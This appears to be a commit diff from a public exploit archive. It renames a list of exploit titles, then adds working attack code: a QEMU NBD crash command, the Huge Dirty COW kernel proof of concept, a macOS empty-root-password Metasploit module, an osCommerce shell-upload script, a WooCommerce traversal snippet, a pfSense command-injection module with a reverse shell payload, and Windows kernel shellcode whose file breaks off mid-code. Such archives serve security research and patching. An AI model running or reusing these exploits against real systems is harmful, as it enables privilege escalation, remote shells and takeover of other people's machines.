Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (1)
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1)

Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (2)
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2)
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape
Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation
macOS High Sierra - Root Privilege Escalation (Metasploit)

lftp 2.6.9 - Remote Stack based Overflow
lftp 2.6.9 - Remote Stack Overflow

BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow
BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)

KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)
KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC)

HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow
HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Buffer Overflow

Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)
Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)

Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)
Citrix Gateway - ActiveX Control Stack Buffer Overflow (Metasploit)

Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit)
Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack Buffer Overflow (Metasploit)

Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption

Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun
Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)
Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)
Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)
Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (1)
Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (2)
Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (3)

GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)
GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (2)

Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities

RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow

Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow
Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Buffer Overflow

Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow
Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Buffer Overflow

AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow
AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Buffer Overflow

Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities
Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities

Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow
Vim - 'mch_expand_wildcards()' Heap Buffer Overflow

Acunetix 8 build 20120704 - Remote Stack Based Overflow
Acunetix 8 build 20120704 - Remote Stack Overflow

Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow
Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Buffer Overflow

TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Based Buffer Overflow Stub
TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub

glibc - 'getaddrinfo' Stack Based Buffer Overflow
glibc - 'getaddrinfo' Remote Stack Buffer Overflow

BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow

Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities
Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities

R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal
R2/Extreme 1.65 - Stack Buffer Overflow / Directory Traversal

Alligra Calligra - Heap Based Buffer Overflow
Alligra Calligra - Heap Buffer Overflow

Aloaha PDF Suite - Stack Based Buffer Overflow
Aloaha PDF Suite - Remote Stack Buffer Overflow

EasyCafe Server 2.2.14 - Remote File Read

Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution

ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)
ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit)

Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)
Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit)

pfSense - Authenticated Group Member Remote Command Execution (Metasploit)

Almnzm - 'COOKIE: customer' SQL Injection

Tutorialms 1.4 (show) - SQL Injection
Tutorialms 1.4 - 'show' SQL Injection

osCommerce 2.3.4.1 - Arbitrary File Upload

Knowledge Base Enterprise Edition 4.62.00 - SQL Injection
Knowledge Base Enterprise Edition 4.62.0 - SQL Injection

WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload

phpDolphin 2.0.5 - Multiple Vulnerabilities

OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities

AbanteCart 1.2.7 - Cross-Site Scripting

MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution
EyesOfNetwork (EON) 5.0 - Remote Code Execution
EyesOfNetwork (EON) 5.0 - SQL Injection
EyesOfNetwork (EON) 5.0 - Remote Code Execution
EyesOfNetwork (EON) 5.0 - SQL Injection

ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities

Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution
Symantec Messaging Gateway 10.6.3-2 - Unauthenticated Root Remote Command Execution
phpCollab 2.5.1 - Arbitrary File Upload
phpCollab 2.5.1 - SQL Injection
phpCollab 2.5.1 - Arbitrary File Upload
phpCollab 2.5.1 - SQL Injection

Synology StorageManager 5.2 - Remote Root Command Execution
Synology StorageManager 5.2 - Root Remote Command Execution
WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal

exploits/linux/dos/43194.txt

@@ -0,0 +1,20 @@
+Introduced in commit f37708f6b8 (2.10).  The NBD spec says a client
+can request export names up to 4096 bytes in length, even though
+they should not expect success on names longer than 256.  However,
+qemu hard-codes the limit of 256, and fails to filter out a client
+that probes for a longer name; the result is a stack smash that can
+potentially give an attacker arbitrary control over the qemu
+process.
+
+The smash can be easily demonstrated with this client:
+
+$ qemu-io f raw nbd://localhost:10809/$(printf %3000d 1 | tr ' ' a)
+
+If the qemu NBD server binary (whether the standalone qemu-nbd, or
+the builtin server of QMP nbd-server-start) was compiled with
+-fstack-protector-strong, the ability to exploit the stack smash
+into arbitrary execution is a lot more difficult (but still
+theoretically possible to a determined attacker, perhaps in
+combination with other CVEs).  Still, crashing a running qemu (and
+losing the VM) is bad enough, even if the attacker did not obtain
+full execution control.

exploits/linux/dos/43199.c

@@ -0,0 +1,181 @@
+// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0
+// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC
+// Author Note: Before running, make sure to set transparent huge pages to "always": `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`
+//
+
+//
+// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.
+// Compile with "gcc -pthread main.c"
+//
+// November 2017
+// Bindecy
+//
+
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>    
+#include <unistd.h> 
+#include <sched.h>
+#include <string.h>
+#include <pthread.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h> 
+
+#define MAP_BASE        ((void *)0x4000000)
+#define MAP_SIZE        (0x200000)
+#define MEMESET_VAL     (0x41)
+#define PAGE_SIZE       (0x1000)
+#define TRIES_PER_PAGE  (20000000)
+
+struct thread_args {
+    char *thp_map;
+    char *thp_chk_map;
+    off_t off;
+    char *buf_to_write;
+    int stop;
+    int mem_fd1;
+    int mem_fd2;
+};
+
+typedef void * (*pthread_proc)(void *);
+
+void *unmap_and_read_thread(struct thread_args *args) {
+    char c;
+    int i;
+    for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {        
+        madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.
+        
+        memcpy(&c, args->thp_map + args->off, sizeof(c));
+        read(args->mem_fd2, &c, sizeof(c));
+        
+        lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);
+        usleep(10); // We placed the zero page and marked its PMD as dirty. 
+                    // Give get_user_pages() another chance before madvise()-ing again.
+    }
+    
+    return NULL;
+}
+
+void *write_thread(struct thread_args *args) {
+    int i;
+    for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
+        lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);
+        madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.
+        write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);
+    }
+    
+    return NULL;
+}
+
+void *wait_for_success(struct thread_args *args) {
+    while (args->thp_chk_map[args->off] != MEMESET_VAL) {
+        madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);
+        sched_yield();
+    }
+
+    args->stop = 1;
+    return NULL;
+}
+
+int main() {
+    struct thread_args args;
+    void *thp_chk_map_addr;
+    int ret;
+
+    // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.
+    args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+    if (args.thp_map == MAP_FAILED) {
+        perror("[!] mmap()");
+        return -1;
+    }
+    if (args.thp_map != MAP_BASE) {
+        fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n");
+        goto err_unmap1;
+    }
+    
+    printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map);
+
+    thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge
+    args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 
+    if (args.thp_chk_map == MAP_FAILED) {
+        perror("[!] mmap()");
+        goto err_unmap1;
+    }
+    if (args.thp_chk_map != thp_chk_map_addr) {
+        fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n");
+        goto err_unmap2;
+    }
+    
+    ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); 
+    ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);
+    if (ret) {
+        perror("[!] madvise()");
+        goto err_unmap2;
+    }
+
+    args.buf_to_write = malloc(PAGE_SIZE);
+    if (!args.buf_to_write) {
+        perror("[!] malloc()");
+        goto err_unmap2;
+    }
+    memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);
+    
+    args.mem_fd1 = open("/proc/self/mem", O_RDWR);
+    if (args.mem_fd1 < 0) {
+        perror("[!] open()");
+        goto err_free;
+    }
+    
+    args.mem_fd2 = open("/proc/self/mem", O_RDWR);
+    if (args.mem_fd2 < 0) {
+        perror("[!] open()");
+        goto err_close1;
+    }
+
+    printf("[*] Racing. Gonna take a while...\n");
+    args.off = 0;
+
+    // Overwrite every single page
+    while (args.off < MAP_SIZE) {   
+        pthread_t threads[3]; 
+        args.stop = 0;
+        
+        ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);
+        ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);
+        ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);
+        
+        if (ret) {
+            perror("[!] pthread_create()");
+            goto err_close2;
+        }
+        
+        pthread_join(threads[0], NULL); // This call will return only after the overwriting is done
+        pthread_join(threads[1], NULL);
+        pthread_join(threads[2], NULL);
+
+        args.off += PAGE_SIZE;    
+        printf("[*] Done 0x%lx bytes\n", args.off);
+    }
+    
+    printf("[*] Success!\n");
+    
+err_close2:
+    close(args.mem_fd2);
+err_close1:
+    close(args.mem_fd1);
+err_free:
+    free(args.buf_to_write);
+err_unmap2:
+    munmap(args.thp_chk_map, MAP_SIZE);
+err_unmap1:
+    munmap(args.thp_map, MAP_SIZE);
+    
+    if (ret) {
+        fprintf(stderr, "[!] Exploit failed.\n");
+    }
+    
+    return ret;
+}

exploits/macos/local/43201.rb

@@ -0,0 +1,55 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Mac OS X Root Privilege Escalation',
+      'Description'   => %q{
+        This module exploits a serious flaw in MacOSX High Sierra.
+        Any user can login with user "root", leaving an empty password.
+      },
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],
+          [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],
+          [ 'URL', 'https://forums.developer.apple.com/thread/79235' ],
+        ],
+      'Platform'      => 'osx',
+      'Arch'          => ARCH_X64,
+      'DefaultOptions' =>
+      {
+        'PAYLOAD'      => 'osx/x64/meterpreter_reverse_tcp',
+      },
+      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'Targets'       => [
+        [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Nov 29 2017'
+    ))
+  end
+
+  def exploit_cmd(root_payload)
+    "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"
+  end
+
+  def exploit
+    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    print_status("Writing payload file as '#{payload_file}'")
+    write_file(payload_file, payload.raw)
+    register_file_for_cleanup(payload_file)
+    output = cmd_exec("chmod +x #{payload_file}")
+    print_status("Executing payload file as '#{payload_file}'")
+    cmd_exec(exploit_cmd(payload_file))
+  end
+end

exploits/php/webapps/43191.py

@@ -0,0 +1,119 @@
+# Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload
+# Date: 11.11.2017
+# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
+# Vendor Homepage: https://www.oscommerce.com/
+# Software Link: https://www.oscommerce.com/Products&Download=oscom234
+# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
+# Tested on: Linux, Windows
+
+"""
+osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user
+being privileged enough to send newsletters can exploit an objection injection in the osCommerce core to
+upload any file, allowing the user to gain shell access. The user does not need to be an administrator,
+any account with access to the newsletters will do.
+More details can be found here:
+    https://scannell-infosec.net/uploading-a-shell-from-within-the-oscommerce-admin-panel-via-object-injection/
+"""
+
+import urlparse
+import argparse
+import sys
+import requests
+
+
+DEFAULT_ADMIN_URL = "/catalog/admin/"
+DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php"
+
+
+# Builds an authenticated session and returns it if it was successful
+def authenticate(username, password, url):
+    # Build the Session and grab the inital cookie
+    session = requests.Session()
+    session.get(url + "login.php", allow_redirects=False)
+
+    get_params = {'action': "process"}
+    data = {"username": username, "password": password}
+
+    # Attempt the authentication
+    r = session.post(url + "login.php", data=data, params=get_params, allow_redirects=False)
+
+    if r.status_code == 302:
+        return session
+    else:
+        return False
+
+
+def upload_file(local_filename, session, url):
+    newsletter_script = url + "newsletters.php"
+    r = session.get(newsletter_script, params={"action": "new"})
+
+    payload = {
+        'module': 'upload',
+        'title': 'uploaded_fname',
+        'content': './'
+    }
+
+    # Create the vulnerable newsletter and grab its ID
+    r = session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False)
+    try:
+        newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:]
+        print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id)
+    except:
+        print "[-] The script wasn't able to create a new newsletter"
+        exit(1)
+
+    # Now lock the newsletter
+    r = session.post(newsletter_script, params={"action": "lock", "nID": newsletter_id})
+    print "[+] Successfully locked the newsletter. Now attempting to upload.."
+
+    # Send the final request, containing the file!
+    files = {
+        'uploaded_fname': open(local_filename)
+    }
+    r = session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files)
+
+    print "[*] Now trying to verify that the file %s uploaded.." % (local_filename)
+
+    shell_url = url + local_filename
+    r = requests.get(shell_url)
+    print "[+] Got a HTTP 200 Reply for the uploaded file!"
+    print "[+] The uploaded file should now be available at %s" % (shell_url)
+
+
+
+# Main Routine starts here
+
+usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \
+        "Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \
+        "NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0])
+
+
+parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage)
+parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True)
+parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True)
+parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True)
+parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False)
+args = parser.parse_args()
+
+# Parse username and password
+username = args.auth.split(":")[0]
+password = args.auth.split(":")[1]
+
+
+url = args.target_url
+# If the user hasn't passed a path to the osCommerce Admin Panel, use the default
+if not args.admin_path:
+    url += DEFAULT_ADMIN_URL
+else:
+    url += args.admin_path
+
+# Authenticate the user and establish the connection
+session = authenticate(username, password, url)
+
+if not session:
+    print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php")
+    exit(1)
+else:
+    print "[+] Authentication successful"
+
+upload_file(args.file, session, url)

exploits/php/webapps/43196.txt

@@ -0,0 +1,43 @@
+# Exploit Title: WordPress woocommerce  directory traversal
+# Date: 28-11-2017
+# Software Link: https://wordpress.org/plugins/woocommerce/
+# Exploit Author:fu2x2000
+# Contact: fu2x2000@gmail.com
+# Website:
+# CVE:2017-17058
+#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
+# Category: webapps
+
+
+1. Description
+
+Identifying woo commerce theme pluging properly sanitized against Directory
+Traversal,even the latest version of WordPress with woocommerce can be
+vulnerable.
+
+2. Proof of Concept
+
+$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
+function file_get_contents_utf8($fn) {
+    $opts = array(
+        'http' => array(
+            'method'=>"GET",
+            'header'=>"Content-Type: text/html; charset=utf-8"
+        )
+    );
+
+    $wp = stream_context_create($opts);
+    $result = @file_get_contents($fn,false,$wp);
+    return $result;
+}
+/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
+header("Content-Type: text/html; charset=utf-8");
+
+$result = file_get_contents_utf8("http://".$woo);
+
+echo $result;
+
+
+Regards
+
+Fu2x200

exploits/unix/remote/43193.rb

@@ -0,0 +1,189 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'pfSense authenticated group member RCE',
+        'Description' => %q(
+          pfSense, a free BSD based open source firewall distribution,
+          version <= 2.3.1_1 contains a remote command execution
+          vulnerability post authentication in the system_groupmanager.php page.
+          Verified against 2.2.6 and 2.3.
+        ),
+        'Author'      =>
+          [
+            's4squatch', # discovery
+            'h00die'     # module
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '43128' ],
+            [ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' =>
+          {
+            'SSL' => true,
+            'PAYLOAD' => 'cmd/unix/reverse_openssl'
+          },
+        'Arch'           => [ ARCH_CMD ],
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl openssl'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Nov 06 2017'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']),
+        Opt::RPORT(443)
+      ], self.class
+    )
+  end
+
+  def login
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'GET'
+    )
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+
+    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+    vprint_status("CSRF Token for login: #{csrf}")
+
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld'  => datastore['USERNAME'],
+        'passwordfld'  => datastore['PASSWORD'],
+        'login'        => ''
+      }
+    )
+    unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
+    end
+    if res.code == 302
+      vprint_status('Successful Authentication')
+      return res.get_cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      return nil
+    end
+  end
+
+  def detect_version(cookie)
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'GET',
+      'cookie' => cookie
+    )
+    unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
+    end
+    /Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body
+    if version
+      print_status("pfSense Version Detected: #{version}")
+      return Gem::Version.new(version)
+    end
+    # If the device isn't fully setup, you get stuck at redirects to wizard.php
+    # however, this does NOT stop exploitation strangely
+    print_error("pfSens Version Not Detected or wizard still enabled.")
+    Gem::Version.new('0.0')
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => '/index.php',
+        'method'    => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      if /Login to pfSense/ =~ res.body
+        Exploit::CheckCode::Detected
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      cookie = login
+      version = detect_version(cookie)
+      vprint_good('Login Successful')
+      res = send_request_cgi(
+        'uri'    => '/system_groupmanager.php',
+        'method' => 'GET',
+        'cookie' => cookie,
+        'vars_get' => {
+          'act' => 'new'
+        }
+      )
+
+      /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+      vprint_status("CSRF Token for group creation: #{csrf}")
+
+      group_name = rand_text_alpha(10)
+      post_vars = {
+        '__csrf_magic' => csrf,
+        'groupname' => group_name,
+        'description' => '',
+        'members[]' => "0';#{payload.encoded};'",
+        'groupid' => '',
+        'save' => 'Save'
+      }
+      if version >= Gem::Version.new('2.3')
+        post_vars = post_vars.merge('gtype' => 'local')
+      elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed
+        post_vars = post_vars.merge(
+          'act' => '',
+          'gtype' => '',
+          'privid' => ''
+        )
+      end
+      send_request_cgi(
+        'uri'           => '/system_groupmanager.php',
+        'method'        => 'POST',
+        'cookie'        => cookie,
+        'vars_post'     => post_vars,
+        'vars_get' => {
+          'act' => 'edit'
+        }
+      )
+      print_status("Manual removal of group #{group_name} is required.")
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end

exploits/win_x86/local/43192.c

@@ -0,0 +1,68 @@
+/* 
+  EDB Note
+  Source ~ https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d
+  Source ~ https://blog.xpnsec.com/windows-warbird-privesc/
+  Source ~ https://github.com/xpn/warbird_exploit
+  Ref ~ https://bugs.chromium.org/p/project-zero/issues/detail?id=1391
+*/
+
+    // Shellcode to be executed by exploit
+    const char shellcode[256] = {
+	0xc7, 0x43, 0x04, 0x00, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x0c,
+	0x00, 0x00, 0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f,
+	0x5e, 0x5b, 0x89, 0xec, 0x5d, 0x81, 0xc4, 0x0c, 0x00, 0x00,
+	0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5e, 0x5b, 0x5f,
+	0x89, 0xec, 0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81,
+	0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f, 0x5e, 0x5b, 0x89, 0xec,
+	0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x04,
+	0x00, 0x00, 0x00, 0x5f, 0x5f, 0x5e, 0x5b, 0x89, 0xec, 0x5d,
+	0x60, 0x64, 0xa1, 0x24, 0x01, 0x00, 0x00, 0xc7, 0x80, 0x3e,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xe8,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xec,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf0,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf4,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf8,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xfc,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x50,
+	0x01, 0x00, 0x00, 0x81, 0xb8, 0x7c, 0x01, 0x00, 0x00, 0x63,
+	0x6d, 0x64, 0x2e, 0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00,
+	0x00, 0x2d, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0xe7, 0x89, 0xc3,
+	0x81, 0xb8, 0xb4, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x2d, 0xb8,
+	0x00, 0x00, 0x00, 0xeb, 0xe7, 0x8b, 0x88, 0xfc, 0x00, 0x00,
+	0x00, 0x89, 0x8b, 0xfc, 0x00, 0x00, 0x00, 0x61, 0xc3, 0xff,
+	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+	0xff, 0xff, 0xff, 0xff, 0xff, 0xff
+    };
+
+void exploit(void) {
+	BYTE Buffer[8];
+	DWORD BytesReturned;
+    
+	RtlZeroMemory(Buffer, sizeof(Buffer));
+	NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);
+    
+	// Copy our shellcode to the NULL page
+	RtlCopyMemory(NULL, shellcode, 256);
+    
+	RtlZeroMemory(Buffer, sizeof(Buffer));
+	NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					             )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
